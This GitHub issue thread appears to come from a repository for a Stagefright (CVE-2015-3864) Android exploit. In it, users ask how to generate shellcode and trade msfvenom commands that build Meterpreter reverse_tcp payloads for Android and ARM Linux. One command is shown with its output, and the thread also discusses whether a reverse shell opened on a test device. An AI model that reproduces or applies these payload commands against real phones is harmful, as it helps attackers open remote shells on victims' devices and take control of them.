Shellcode #2

Open
umerov1999 opened this issue Dec 21, 2015 · 6 comments
@umerov1999

How do I make shellcode for this exploit? Your shellcode.bin is the apk file, is that correct? Have you tested this exploit?

@eudemonics
Owner

i generated it with msfvenom actually but haven't been able to get it working successfully, so i suggest using your own shellcode. the included shellcode is supposed to be a reverse tcp shell for android arm architecture.

@umerov1999
Author

I generated shellcode.bin with msfvenom (msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.21 lport=1996 R > shellcode.bin) and created exploit.mp4, but this exploit doesn't work on my device (Samsung Galaxy Note 8, armv7-a, Android 4.4.4 official). My device is vulnerable to CVE-2015-3864 (tested in Zimperium Stagefright Detector).

@sgang007

@eudemonics Can you give any working shellcode or tell me how to generate one to test the code?

@umerov1999
Author

This shellcode armle/linux/reverse_tcp

@dadreamer

@umerov1999
Thx for this hint, I was trying to build a shellcode for android, not for linux. So, it should look something like this:

msf > msfvenom -p linux/armle/meterpreter/reverse_tcp lhost=192.168.0.4 lport=8080 R > ~/scaredycat-master/shellcode.bin
[*] exec: msfvenom -p linux/armle/meterpreter/reverse_tcp lhost=192.168.0.4 lport=8080 R > ~/scaredycat-master/shellcode.bin

No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: armle from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 200 bytes

Did you get the reverse shell successfully with the code you've posted above? I don't with mine and I'm unsure how to test it.
